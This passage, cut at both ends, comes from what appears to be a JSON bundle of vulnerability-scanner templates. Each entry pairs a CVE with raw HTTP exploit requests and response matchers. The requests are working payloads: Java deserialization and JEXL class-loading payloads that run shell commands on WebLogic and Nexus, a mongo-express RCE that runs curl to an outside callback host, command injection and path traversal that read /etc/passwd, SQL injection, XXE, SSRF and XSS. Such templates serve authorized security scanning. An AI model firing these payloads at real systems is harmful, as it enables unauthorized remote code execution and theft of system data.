zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Manager","License:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Social Warfare"]}]},{"raw":["GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYX